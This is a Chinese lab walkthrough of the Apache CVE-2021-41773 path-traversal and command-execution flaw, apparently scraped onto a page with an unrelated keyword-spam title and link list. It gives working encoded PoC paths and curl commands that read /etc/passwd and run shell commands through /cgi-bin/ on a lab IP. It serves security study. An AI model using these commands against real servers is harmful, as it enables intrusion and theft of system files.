当前位置: 首页 > news >正文

中国建设银行假网站个人社保缴费应交多少

中国建设银行假网站,个人社保缴费应交多少,所见即所得的网页设计软件,建立网站需要多少钱一个本文仅作为学习参考使用,本文作者对任何使用本文进行渗透攻击破坏不负任何责任。 前言: 本文主要讲解apache命令执行漏洞(cve_2021_41773)。 靶场链接:Vulfocus 漏洞威胁分析平台 一,漏洞简介。 cve_2021_41773漏洞…

本文仅作为学习参考使用,本文作者对任何使用本文进行渗透攻击破坏不负任何责任。

前言:

本文主要讲解apache命令执行漏洞(cve_2021_41773)。

靶场链接:Vulfocus 漏洞威胁分析平台

一,漏洞简介。

cve_2021_41773漏洞是一个目录穿越的高危漏洞,主要影响版本有:Apache(阿帕奇) 2.4.49 和 Apache 2.4.50;其对路径规范化所做的更改中存在一个路径穿越漏洞,攻击者可利用该漏洞读取到Web目录外的其他文件,如系统配置文件、网站源码等,甚至在特定情况下,攻击者可构造恶意请求执行命令,控制服务器。

二,poc。

具体poc已给出:

get传参方式poc为:

/icons/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd

可以看到是一段经过了url编码的内容,解密后为:

2,post传参:

/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh

经过两次url解码后,结果为:

三,漏洞利用。

打开靶场连接后,可以发现是一个阿帕奇服务的默认界面。

通过抓包后发现,传参方式为get:

此处使用get传参的poc。

进行攻击测试(poc填写到红框内):

可以看到,回显为修改请求头所读的敏感信息。

此处为什么要用burp,因为浏览器自动对路径进行了一次url解码,用burp发送过去的请求,不会被自动解码

‍四,rce。

1,查看敏感文件。

在kali上使用curl 命令进⾏进一步渗透工作。

读取敏感文件的命令为:

 curl -v --path-as-is http://[ip]:port/icons/.%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/etc/passwd

① [ip] 替换成被攻击服务器的 IP。

② port 替换为被攻击服务器端⼝。

curl简介:Linux命令行工具:curl详解(与服务器之间传输数据)_curl socks5代理-CSDN博客

2,通用操作。 

具体格式为:

 curl --data "echo;shell" http://123.58.224.8:27400/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh 

替换shell为想要执行的命令。

取得敏感信息,查询一下当前用户:

 curl --data "echo;whoami" http://123.58.224.8:27400/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh 

查看一下当前目录:

 curl --data "echo;pwd"  http://123.58.224.8:27400/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh       

获取flag:

curl --data  "echo;ls /tmp"   http://123.58.224.8:27400/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh 

http://www.yayakq.cn/news/451449/

相关文章:

  • 天猫网站建设分析新手制作网站
  • 更改网站模板内容餐厅网站页面设计
  • seo如何建立优化网站网站建设与管理维护书籍
  • 网站开发就业薪酬若羌县铁路一建设网站
  • 石家庄网站建设教程移动关闭流量自动续费
  • 网红网站建设吉林网站建设找哪家
  • 网站群系统建设标准网站空间的存放种类
  • 百度开放云搭建网站成全视频观看免费观看
  • 顺企网属于什么网站导视设计方法
  • 浏览器做单页网站项目金融 网站 源码
  • 织梦网站发稿说明wordpress 移动api
  • 网站布局分析苏州建筑行业网站建设
  • 什么网站有项目做优量汇广告平台
  • 网上做论文的网站有哪些内容网站制作教程ppt
  • 网站导航栏图标推广广告投放
  • 焦作会做网站制作的有哪家安徽万振建设集团网站
  • 徐州 商城网站建设上海网站建设 s
  • 网站设计客户端如何用两个版本的wordpress
  • 关于水果的网站开发用了mip的网站
  • 深圳珠宝网站建设风向 网站
  • 安阳 网站建设个人备案的网站能做盈利吗
  • 怎么做房地产网站网页设计网站布局分析
  • 市桥做网站网站建
  • 西安市长安区规划建设局网站wordpress木马检测
  • 网站上海备案查询系统江都建设集团有限公司官方网站
  • 网站建设公司山西微软手机做网站服务器
  • 网站权重优化wordpress ajax顶踩
  • 有了域名后怎么完成网站建设上海网站推广营销设计
  • 产品展示的手机网站商贸公司寮步网站建设价钱
  • 中国建设网站微信指数查询